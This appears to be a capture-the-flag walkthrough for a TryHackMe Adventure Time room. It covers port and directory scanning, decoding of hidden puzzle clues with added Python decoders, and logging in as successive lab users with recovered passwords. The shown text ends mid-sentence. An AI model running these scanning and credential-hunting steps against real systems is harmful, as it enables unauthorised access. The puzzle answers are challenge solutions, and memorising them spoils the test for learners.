30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Adventure Time

Description

A CTF-based challenge with a lot of puzzles I created for TryHackMe. It isn’t a real-world challenge, but for the puzzler it’s a nice brainteaser.
This write-up is a guide for those who got stuck along the way.

root@lab:~/THM/AdventureTime# nmap -T4 -sS -sV -sC -p- 192.168.245.132
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 17:10 CEST
Stats: 0:01:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 17:11 (0:00:22 remaining)
Nmap scan report for 192.168.245.132
Host is up (0.0010s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r--    1 ftp      ftp       1401357 Sep 21 14:51 1.jpg
| -r--r--r--    1 ftp      ftp        233977 Sep 21 14:51 2.jpg
| -r--r--r--    1 ftp      ftp        524615 Sep 21 14:51 3.jpg
| -r--r--r--    1 ftp      ftp        771076 Sep 21 14:52 4.jpg
| -r--r--r--    1 ftp      ftp       1644395 Sep 21 14:52 5.jpg
|_-r--r--r--    1 ftp      ftp         40355 Sep 21 14:53 6.jpg
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.245.129
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 58:d2:86:99:c2:62:2d:95:d0:75:9c:4e:83:b6:1b:ca (RSA)
|   256 db:87:9e:06:43:c7:6e:00:7b:c3:bc:a1:97:dd:5e:83 (ECDSA)
|_  256 6b:40:84:e6:9c:bc:1c:a8:de:b2:a1:8b:a3:6a:ef:f0 (ED25519)
80/tcp    open  http     Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
443/tcp   open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: You found Finn
| ssl-cert: Subject: commonName=adventure-time.com/organizationName=Candy Corporate Inc./stateOrProvinceName=Candy Kingdom/countryName=CK
| Not valid before: 2019-09-20T08:29:36
|_Not valid after:  2020-09-19T08:29:36
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
31337/tcp open  Elite?
| fingerprint-strings: 
|   DNSStatusRequestTCP, RPCCheck, SSLSessionReq: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not
|   DNSVersionBindReqTCP: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not 
|     version
|     bind
|   GenericLines, NULL: 
|     Hello Princess Bubblegum. What is the magic word?
|   GetRequest: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not GET / HTTP/1.0
|   HTTPOptions: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not OPTIONS / HTTP/1.0
|   Help: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not HELP
|   RTSPRequest: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not OPTIONS / RTSP/1.0
|   SIPOptions: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not OPTIONS sip:nm SIP/2.0
|     Via: SIP/2.0/TCP nm;branch=foo
|     From: <sip:nm@nm>;tag=root
|     <sip:nm2@nm2>
|     Call-ID: 50000
|     CSeq: 42 OPTIONS
|     Max-Forwards: 70
|     Content-Length: 0
|     Contact: <sip:nm@nm>
|_    Accept: application/sdp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.80%I=7%D=9/23%Time=5D88E057%P=x86_64-pc-linux-gnu%r(N
SF:ULL,32,"Hello\x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x20magic\
SF:x20word\?\n")%r(GetRequest,57,"Hello\x20Princess\x20Bubblegum\.\x20What
SF:\x20is\x20the\x20magic\x20word\?\nThe\x20magic\x20word\x20is\x20not\x20
SF:GET\x20/\x20HTTP/1\.0\n")%r(SIPOptions,124,"Hello\x20Princess\x20Bubble
SF:gum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe\x20magic\x20word\x20
SF:is\x20not\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r\nVia:\x20SIP/2\.0/TCP\x20n
SF:m;branch=foo\r\nFrom:\x20<sip:nm@nm>;tag=root\r\nTo:\x20<sip:nm2@nm2>\r
SF:\nCall-ID:\x2050000\r\nCSeq:\x2042\x20OPTIONS\r\nMax-Forwards:\x2070\r\
SF:nContent-Length:\x200\r\nContact:\x20<sip:nm@nm>\r\nAccept:\x20applicat
SF:ion/sdp\n")%r(GenericLines,32,"Hello\x20Princess\x20Bubblegum\.\x20What
SF:\x20is\x20the\x20magic\x20word\?\n")%r(HTTPOptions,5B,"Hello\x20Princes
SF:s\x20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe\x20magic\
SF:x20word\x20is\x20not\x20OPTIONS\x20/\x20HTTP/1\.0\n")%r(RTSPRequest,5B,
SF:"Hello\x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word
SF:\?\nThe\x20magic\x20word\x20is\x20not\x20OPTIONS\x20/\x20RTSP/1\.0\n")%
SF:r(RPCCheck,75,"Hello\x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x2
SF:0magic\x20word\?\nThe\x20magic\x20word\x20is\x20not\x20\x80\0\0\(r\xfe\
SF:x1d\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\n")%r(DNSVersionBindReqTCP,69,"Hello\x20Princess\x
SF:20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe\x20magic\x20
SF:word\x20is\x20not\x20\0\x1e\0\x06\x01\0\0\x01\0\0\0\0\0\0\x07version\x0
SF:4bind\0\0\x10\0\x03\n")%r(DNSStatusRequestTCP,57,"Hello\x20Princess\x20
SF:Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe\x20magic\x20wo
SF:rd\x20is\x20not\x20\0\x0c\0\0\x10\0\0\0\0\0\0\0\0\0\n")%r(Help,4D,"Hell
SF:o\x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nT
SF:he\x20magic\x20word\x20is\x20not\x20HELP\n")%r(SSLSessionReq,A1,"Hello\
SF:x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe
SF:\x20magic\x20word\x20is\x20not\x20\x16\x03\0\0S\x01\0\0O\x03\0\?G\xd7\x
SF:f7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=
SF:\xdbo\xef\x10n\0\0\(\0\x16\0\x13\0\n\0f\0\x05\0\x04\0e\0d\0c\0b\0a\0`\0
SF:\x15\0\x12\0\t\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0\n");
MAC Address: 00:50:56:24:A0:1F (VMware)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.02 seconds

 

root@lab:~/THM/AdventureTime# gobuster dir -u https://192.168.245.132 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://192.168.245.132
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200
[+] User Agent:     gobuster/3.0.1
[+] Add Slash:      true
[+] Timeout:        10s
===============================================================
2019/09/23 17:12:05 Starting gobuster
===============================================================
/candybar/ (Status: 200)
===============================================================
2019/09/23 17:12:32 Finished
===============================================================

<!-- KBQWY4DONAQHE53UOJ5CA2LXOQQEQSCBEBZHIZ3JPB2XQ4TQNF2CA5LEM4QHEYLKORUC4=== -->

The HTML comment is Base32; decoding it and then applying ROT11 gives the hint:

Always check the SSL certificate for clues.
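
The two steps in that note carried out in Python, as an added example that is not code from the write-up: the comment is Base32-decoded and every letter is then rotated forward by 11 places. The `looks_like_base32` triage check and the `all_rotations` helper are my additions for the usual situation where the rotation amount is not known up front.

```python
import base64
import string

# The HTML comment quoted in the write-up above (Base32 text, then ROT11).
HIDDEN_COMMENT = "KBQWY4DONAQHE53UOJ5CA2LXOQQEQSCBEBZHIZ3JPB2XQ4TQNF2CA5LEM4QHEYLKORUC4==="


def looks_like_base32(s: str) -> bool:
    """Triage check: Base32 uses A-Z and 2-7, '=' padding, and a length that is a multiple of 8."""
    s = s.strip()
    alphabet = string.ascii_uppercase + "234567="
    return bool(s) and len(s) % 8 == 0 and all(c in alphabet for c in s)


def rot(text: str, shift: int) -> str:
    """Rotate every ASCII letter forward by `shift` places, keeping case.
    Digits, spaces and punctuation pass through unchanged (rot(text, 13) is ROT13)."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def decode_hint(comment: str, shift: int = 11) -> str:
    """Base32-decode the comment, then undo the rotation the author applied (ROT11)."""
    raw = base64.b32decode(comment.strip()).decode("ascii")
    return rot(raw, shift)


def all_rotations(text: str) -> dict:
    """Every Caesar shift of `text`, so the readable one can be spotted when the shift is unknown."""
    return {n: rot(text, n) for n in range(26)}


if __name__ == "__main__":
    print(decode_hint(HIDDEN_COMMENT))
    decoded = base64.b32decode(HIDDEN_COMMENT).decode("ascii")
    for n, candidate in all_rotations(decoded).items():
        print(f"{n:2d}: {candidate}")
```

Running it prints the hint, followed by all 26 shifts of the Base32-decoded text; only shift 11 reads as English, which is how the rotation amount is found when the author has not told you.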

root@lab:~/THM/AdventureTime# cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	lab
192.168.245.132	adventure-time.com land-of-ooo.com

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

root@lab:~/THM/AdventureTime# gobuster dir -u https://land-of-ooo.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://land-of-ooo.com/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200
[+] User Agent:     gobuster/3.0.1
[+] Add Slash:      true
[+] Timeout:        10s
===============================================================
2019/09/23 17:20:41 Starting gobuster
===============================================================
/yellowdog/ (Status: 200)
===============================================================
2019/09/23 17:21:10 Finished
===============================================================

root@lab:~/THM/AdventureTime# gobuster dir -u https://land-of-ooo.com/yellowdog/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://land-of-ooo.com/yellowdog/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200
[+] User Agent:     gobuster/3.0.1
[+] Add Slash:      true
[+] Timeout:        10s
===============================================================
2019/09/23 17:23:17 Starting gobuster
===============================================================
/bananastock/ (Status: 200)
===============================================================
2019/09/23 17:23:44 Finished
===============================================================

<!-- _/..../.\_.../._/_./._/_./._/...\._/._./.\_/..../.\_..././.../_/_._.__/_._.__/_._.__ -->

Morse code, with `.` as dot and `_` as dash; a forward slash separates letters and a backslash separates words:

THE BANANAS ARE THE BEST!!!
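
A decoder for that comment, added here as an example and not taken from the write-up. The symbol choices (`.`, `_`, `/`, `\`) follow the note above and are parameters, so the same function works for other made-up Morse spellings; the translation table is standard ITU Morse.

```python
# The HTML comment quoted above. Raw string, because it contains backslashes.
MORSE_COMMENT = r"_/..../.\_.../._/_./._/_./._/...\._/._./.\_/..../.\_..././.../_/_._.__/_._.__/_._.__"

# Standard ITU Morse, written with '.' and '-'.
MORSE_TABLE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F", "--.": "G",
    "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L", "--": "M", "-.": "N",
    "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R", "...": "S", "-": "T", "..-": "U",
    "...-": "V", ".--": "W", "-..-": "X", "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    ".-.-.-": ".", "--..--": ",", "..--..": "?", "-.-.--": "!", "-....-": "-",
    "-..-.": "/", ".--.-.": "@", "---...": ":", "-...-": "=",
}


def decode_morse(text: str, dot: str = ".", dash: str = "_",
                 letter_sep: str = "/", word_sep: str = "\\") -> str:
    """Decode Morse written with arbitrary symbols for dot, dash and the two separators.
    Unknown letter codes are rendered as '?' rather than silently dropped."""
    to_standard = str.maketrans({dot: ".", dash: "-"})
    words = []
    for word in text.split(word_sep):
        letters = []
        for code in word.split(letter_sep):
            if not code:            # tolerate doubled separators / leading slash
                continue
            letters.append(MORSE_TABLE.get(code.translate(to_standard), "?"))
        words.append("".join(letters))
    return " ".join(words)


if __name__ == "__main__":
    print(decode_morse(MORSE_COMMENT))
```

The separator handling is the part that matters in puzzles like this one: the character set is rarely the problem, the letter/word boundaries are, so they are made explicit parameters instead of being guessed from whitespace.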
root@lab:~/THM/AdventureTime# gobuster dir -u https://land-of-ooo.com/yellowdog/bananastock/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://land-of-ooo.com/yellowdog/bananastock/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200
[+] User Agent:     gobuster/3.0.1
[+] Add Slash:      true
[+] Timeout:        10s
===============================================================
2019/09/23 17:25:54 Starting gobuster
===============================================================
/princess/ (Status: 200)
===============================================================
2019/09/23 17:26:25 Finished
===============================================================

    <!--
    Secrettext = 0008f1a92d287b48dccb5079eac18ad2a0c59c22fbc7827295842f670cdb3cb645de3de794320af132ab341fe0d667a85368d0df5a3b731122ef97299acc3849cc9d8aac8c3acb647483103b5ee44166
    Key = my cool password
    IV = abcdefghijklmanopqrstuvwxyz
    Mode = CBC
    Input = hex
    Output = raw
    -->

Decrypting the hex with AES in CBC mode, using the key and IV from the comment, gives:

the magic safe is accessibel at port 31337. the magic word is: ricardio
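
The same decryption reproduced in Python as an added example (not code from the write-up), using the third-party `cryptography` package. Two choices are my assumptions: the 27-character IV cannot be used as-is by AES, so its first 16 bytes are taken, and padding is removed by trusting the PKCS#7 count byte alone, which is what puzzle tooling does. The second function makes the CBC property worth remembering: a wrong IV only garbles the first 16-byte block, so the port number and the magic word come out intact even if the IV guess is off.

```python
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Parameters quoted from the HTML comment above.
SECRET_HEX = "0008f1a92d287b48dccb5079eac18ad2a0c59c22fbc7827295842f670cdb3cb645de3de794320af132ab341fe0d667a85368d0df5a3b731122ef97299acc3849cc9d8aac8c3acb647483103b5ee44166"
KEY = b"my cool password"                      # 16 bytes, so AES-128
IV_AS_GIVEN = b"abcdefghijklmanopqrstuvwxyz"   # 27 bytes; CBC needs exactly one block (16)


def aes_cbc_decrypt(ciphertext: bytes, key: bytes, iv: bytes) -> bytes:
    """AES-CBC decrypt. Assumption: an over-long IV is truncated to its first 16 bytes."""
    iv = iv[:16]
    if len(key) not in (16, 24, 32) or len(iv) != 16 or len(ciphertext) % 16:
        raise ValueError("key must be 16/24/32 bytes, IV 16 bytes, ciphertext a multiple of 16")
    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    # Lenient PKCS#7 strip: only the count byte is checked. On real data verify every
    # padding byte (and authenticate the ciphertext) before acting on the result.
    n = padded[-1]
    return padded[:-n] if 1 <= n <= 16 else padded


def cbc_iv_scope(ciphertext: bytes, key: bytes, iv_a: bytes, iv_b: bytes) -> bool:
    """True when two different IVs change only the first block of the plaintext,
    i.e. the CBC property that every block after the first is independent of the IV."""
    pt_a = aes_cbc_decrypt(ciphertext, key, iv_a)
    pt_b = aes_cbc_decrypt(ciphertext, key, iv_b)
    return pt_a[16:] == pt_b[16:] and pt_a[:16] != pt_b[:16]


if __name__ == "__main__":
    plaintext = aes_cbc_decrypt(bytes.fromhex(SECRET_HEX), KEY, IV_AS_GIVEN)
    print(plaintext.decode("latin-1"))
    print("IV affects only block 0:", cbc_iv_scope(bytes.fromhex(SECRET_HEX), KEY, IV_AS_GIVEN, b"\x00" * 16))
```

The plaintext is 71 bytes in five 16-byte blocks, so nine bytes of padding are stripped; everything from the second block on ("s accessibel at port 31337. ...") is fixed by the key and ciphertext alone, which is why the IV confusion in the comment does not stop the puzzle from being solved.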
root@lab:~/THM/AdventureTime# nc adventure-time.com 31337
Hello Princess Bubblegum. What is the magic word?
ricardio
The new username is: apple-guards
root@lab:~/THM/AdventureTime# ssh apple-guards@adventure-time.com
The authenticity of host 'adventure-time.com (192.168.245.132)' can't be established.
ECDSA key fingerprint is SHA256:xbyqQlD2bMFloDbi6VJNgAlut193WbcnAnRm+ZWvRyE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'adventure-time.com,192.168.245.132' (ECDSA) to the list of known hosts.
apple-guards@adventure-time.com's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

1 package can be updated.
0 updates are security updates.

No mail.
Last login: Sat Sep 21 20:51:11 2019 from 192.168.245.129
apple-guards@at:~$ 
apple-guards@at:~$ cat mbox
From marceline@at  Fri Sep 20 16:39:54 2019
Return-Path: <marceline@at>
X-Original-To: apple-guards@at
Delivered-To: apple-guards@at
Received: by at.localdomain (Postfix, from userid 1004)
	id 6737B24261C; Fri, 20 Sep 2019 16:39:54 +0200 (CEST)
Subject: Need help???
To: <apple-guards@at>
X-Mailer: mail (GNU Mailutils 3.4)
Message-Id: <20190920143954.6737B24261C@at.localdomain>
Date: Fri, 20 Sep 2019 16:39:54 +0200 (CEST)
From: marceline@at

Hi there bananaheads!!!
I heard Princess B revoked your access to the system. Bummer!
But I'll help you guys out.....doesn't cost you a thing.....well almost nothing.

I hid a file for you guys. If you get the answer right, you'll get better access.
Good luck!!!!
apple-guards@at:~$ find / -user marceline -type f 2>/dev/null
/etc/fonts/helper
apple-guards@at:~$ ls -ld /etc/fonts/helper
-rwxr-x--- 1 marceline apple-guards 16616 sep 20 17:35 /etc/fonts/helper
apple-guards@at:~$ file /etc/fonts/helper
/etc/fonts/helper: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, BuildID[sha1]=6cee442f66f3fb132491368c671c1cf91fc28332, for GNU/Linux 3.2.0, not stripped
apple-guards@at:~$ /etc/fonts/helper


======================================
      BananaHead Access Pass          
       created by Marceline           
======================================

Hi there bananaheads!!!
So you found my file?
But it won't help you if you can't answer this question correct.
What? I told you guys I would help and that it wouldn't cost you a thing....
Well I lied hahahaha

Ready for the question?

The key to solve this puzzle is gone
And you need the key to get this readable: Gpnhkse

Did you solve the puzzle?

Gpnhkse is Vigenère ciphertext; decrypting it with the key gone gives Abadeer:
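
The Vigenère step in Python, added as an example that is not from the write-up. Besides decrypting with the given key, `recover_keystream` shows why Vigenère offers no real protection: with any known plaintext the key stream is just the letter-wise difference between ciphertext and plaintext, and its shortest repeating period is the key.

```python
import string


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Vigenère over A-Z. Case is preserved; non-letters pass through without consuming
    a key letter (the convention most solvers use)."""
    shifts = [ord(k) - ord("a") for k in key.lower() if k in string.ascii_lowercase]
    if not shifts:
        raise ValueError("key needs at least one letter")
    out, i = [], 0
    for ch in text:
        if ch in string.ascii_letters:
            s = shifts[i % len(shifts)]
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + (-s if decrypt else s)) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def recover_keystream(ciphertext: str, plaintext: str) -> str:
    """Known-plaintext recovery: each key letter is (c - p) mod 26."""
    pairs = [(c, p) for c, p in zip(ciphertext, plaintext)
             if c in string.ascii_letters and p in string.ascii_letters]
    return "".join(chr((ord(c.lower()) - ord(p.lower())) % 26 + ord("a")) for c, p in pairs)


def shortest_period(keystream: str) -> str:
    """The shortest prefix whose repetition reproduces the whole key stream, i.e. the key."""
    for n in range(1, len(keystream) + 1):
        if all(keystream[i] == keystream[i % n] for i in range(len(keystream))):
            return keystream[:n]
    return keystream


if __name__ == "__main__":
    print(vigenere("Gpnhkse", "gone", decrypt=True))          # Abadeer
    ks = recover_keystream("Gpnhkse", "Abadeer")
    print(ks, "->", shortest_period(ks))                      # gonegon -> gone
```

Seven characters of known plaintext are enough here to recover the full four-letter key, which is the general lesson: a polyalphabetic shift cipher leaks its key as soon as any aligned plaintext is known.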

======================================
      BananaHead Access Pass          
       created by Marceline           
======================================

Hi there bananaheads!!!
So you found my file?
But it won't help you if you can't answer this question correct.
What? I told you guys I would help and that it wouldn't cost you a thing....
Well I lied hahahaha

Ready for the question?

The key to solve this puzzle is gone
And you need the key to get this readable: Gpnhkse

Did you solve the puzzle? yes

What is the word I'm looking for? Abadeer

That's it!!!! You solved my puzzle
Don't tell princess B I helped you guys!!!
My password is 'My friend Finn'
marceline@at:~$ cat I-got-a-secret.txt 
Hello Finn,

I heard that you pulled a fast one over the banana guards.
B was very upset hahahahaha.
I also heard you guys are looking for BMO's resetcode.
You guys broke him again with those silly games?

You know I like you Finn, but I don't want to anger B too much.
So I will help you a little bit...

But you have to solve my little puzzle. Think you're up for it?
Hahahahaha....I know you are.

111111111100100010101011101011111110101111111111011011011011000001101001001011111111111111001010010111100101000000000000101001101111001010010010111111110010100000000000000000000000000000000000000010101111110010101100101000000000000000000000101001101100101001001011111111111111111111001010000000000000000000000000001010111001010000000000000000000000000000000000000000000001010011011001010010010111111111111111111111001010000000000000000000000000000000001010111111001010011011001010010111111111111100101001000000000000101001111110010100110010100100100000000000000000000010101110010100010100000000000000010100000000010101111100101001111001010011001010010000001010010100101011100101001101100101001011100101001010010100110110010101111111111111111111111111111111110010100100100000000000010100010100111110010100000000000000000000000010100111111111111111110010100101111001010000000000000001010

This is Spoon, a Brainfuck dialect written as bits; running it prints:

The magic word you are looking for is ApplePie
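
A Spoon decoder added here as an example (not code from the write-up): Spoon maps each Brainfuck instruction to a prefix-free bit string, so decoding is a token walk over the bits, followed by a small Brainfuck interpreter. `PAGE_PROGRAM` is the blob from I-got-a-secret.txt copied from above; `bf_to_spoon` is my addition so the decoder can be checked against a program whose output is known.

```python
# Spoon's instruction encoding (prefix-free, so a left-to-right scan is unambiguous).
SPOON_TO_BF = {
    "1": "+", "000": "-", "010": ">", "011": "<", "0011": "]", "00100": "[",
    "001010": ".", "0010110": ",",
    "00101110": "#",   # Spoon extra: dump memory (ignored by this interpreter)
    "00101111": "!",   # Spoon extra: exit
}
BF_TO_SPOON = {op: code for code, op in SPOON_TO_BF.items()}

# The binary blob from I-got-a-secret.txt, quoted above.
PAGE_PROGRAM = "111111111100100010101011101011111110101111111111011011011011000001101001001011111111111111001010010111100101000000000000101001101111001010010010111111110010100000000000000000000000000000000000000010101111110010101100101000000000000000000000101001101100101001001011111111111111111111001010000000000000000000000000001010111001010000000000000000000000000000000000000000000001010011011001010010010111111111111111111111001010000000000000000000000000000000001010111111001010011011001010010111111111111100101001000000000000101001111110010100110010100100100000000000000000000010101110010100010100000000000000010100000000010101111100101001111001010011001010010000001010010100101011100101001101100101001011100101001010010100110110010101111111111111111111111111111111110010100100100000000000010100010100111110010100000000000000000000000010100111111111111111110010100101111001010000000000000001010"


def spoon_to_bf(bits: str) -> str:
    """Translate a Spoon bit string into Brainfuck; whitespace and line breaks are ignored."""
    bits = "".join(c for c in bits if c in "01")
    ops, i = [], 0
    while i < len(bits):
        for code, op in SPOON_TO_BF.items():
            if bits.startswith(code, i):
                ops.append(op)
                i += len(code)
                break
        else:
            raise ValueError(f"no Spoon token at bit offset {i} (truncated input?)")
    return "".join(ops)


def bf_to_spoon(bf: str) -> str:
    """Inverse translation; non-instruction characters are dropped."""
    return "".join(BF_TO_SPOON[op] for op in bf if op in BF_TO_SPOON)


def run_bf(code: str, max_steps: int = 5_000_000) -> str:
    """Minimal Brainfuck interpreter: 8-bit wrapping cells, no input, bounded step count."""
    jump, stack = {}, []
    for pos, op in enumerate(code):
        if op == "[":
            stack.append(pos)
        elif op == "]":
            if not stack:
                raise ValueError("unbalanced ']'")
            start = stack.pop()
            jump[start], jump[pos] = pos, start
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, pc, out = bytearray(30000), 0, 0, []
    for _ in range(max_steps):
        if pc >= len(code):
            break
        op = code[pc]
        if op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ">":
            ptr += 1
        elif op == "<":
            ptr -= 1
        elif op == ".":
            out.append(chr(tape[ptr]))
        elif op == ",":
            tape[ptr] = 0                      # no input source in a decoder
        elif op == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif op == "]" and tape[ptr] != 0:
            pc = jump[pc]
        elif op == "!":
            break
        if not 0 <= ptr < len(tape):
            raise IndexError("tape pointer out of range")
        pc += 1
    else:
        raise RuntimeError("step limit reached; the program may not terminate")
    return "".join(out)


def run_spoon(bits: str) -> str:
    return run_bf(spoon_to_bf(bits))


if __name__ == "__main__":
    print(spoon_to_bf(PAGE_PROGRAM)[:60], "...")
    print(run_spoon(PAGE_PROGRAM))
```

The first tokens of the page's program translate to `++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>`, the usual Brainfuck idiom that fills four cells with 10, 30, 70 and 100 before printing from them; the step limit and bracket check are there so an arbitrary blob pulled off a box cannot hang or crash the decoder.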
root@lab:~/THM/AdventureTime# nc adventure-time.com 31337
Hello Princess Bubblegum. What is the magic word?
ApplePie
The password of peppermint-butler is: That Black Magic
marceline@at:~$ su peppermint-butler 
Password: 
peppermint-butler@at:/home/marceline$ cd
peppermint-butler@at:~$ ls -lah
total 116K
drwxr-x---  4 peppermint-butler peppermint-butler 4,0K sep 23 13:56 .
drwxr-xr-x 10 root              root              4,0K sep 20 20:53 ..
-rw-r--r--  1 peppermint-butler peppermint-butler  220 apr  4  2018 .bash_logout
-rw-r--r--  1 peppermint-butler peppermint-butler 3,7K apr  4  2018 .bashrc
-rw-------  1 peppermint-butler peppermint-butler  84K sep 21 11:44 butler-1.jpg
drwx------  2 peppermint-butler peppermint-butler 4,0K sep 20 21:16 .cache
-rw-r-----  1 peppermint-butler peppermint-butler   28 sep 22 11:04 flag3
drwx------  3 peppermint-butler peppermint-butler 4,0K sep 20 21:16 .gnupg
-rw-r--r--  1 peppermint-butler peppermint-butler  807 apr  4  2018 .profile
root@lab:~/THM/AdventureTime# scp peppermint-butler@adventure-time.com:/home/peppermint-butler/butler-1.jpg .
peppermint-butler@adventure-time.com's password: 
butler-1.jpg
root@lab:~/THM/AdventureTime# steghide extract -sf butler-1.jpg 
Enter passphrase: 
steghide: could not extract any data with that passphrase!
peppermint-butler@at:~$ find / -user peppermint-butler -type f 2>/dev/null | \grep -v -e '/home\|/proc' | xargs ls -ld
-rw-r----- 1 peppermint-butler peppermint-butler 299 sep 21 11:52 /etc/php/zip.txt
-rw-r----- 1 peppermint-butler peppermint-butler 300 sep 21 11:50 /usr/share/xml/steg.txt
peppermint-butler@at:~$ find / -user peppermint-butler -type f 2>/dev/null | \grep -v -e '/home\|/proc' | xargs cat
I need to keep my secrets safe.
There are people in this castle who can't be trusted.
Those banana guards are not the smartest of guards.
And that Marceline is a friend of princess Bubblegum,
but I don't trust her.

So I need to keep this safe.

The password of my secret file is 'ToKeepASecretSafe'
I need to keep my secrets safe.
There are people in this castle who can't be trusted.
Those banana guards are not the smartest of guards.
And that Marceline is a friend of princess Bubblegum,
but I don't trust her.

So I need to keep this safe.

The password of my secret file is 'ThisIsReallySave'
root@lab:~/THM/AdventureTime# steghide extract -sf butler-1.jpg 
Enter passphrase: 
wrote extracted data to "secrets.zip".
root@lab:~/THM/AdventureTime# unzip secrets.zip
Archive:  secrets.zip
[secrets.zip] secrets.txt password: 
 extracting: secrets.txt
root@lab:~/THM/AdventureTime# cat secrets.txt 
[0200 hours][upper stairs]
I was looking for my arch nemesis Peace Master, 
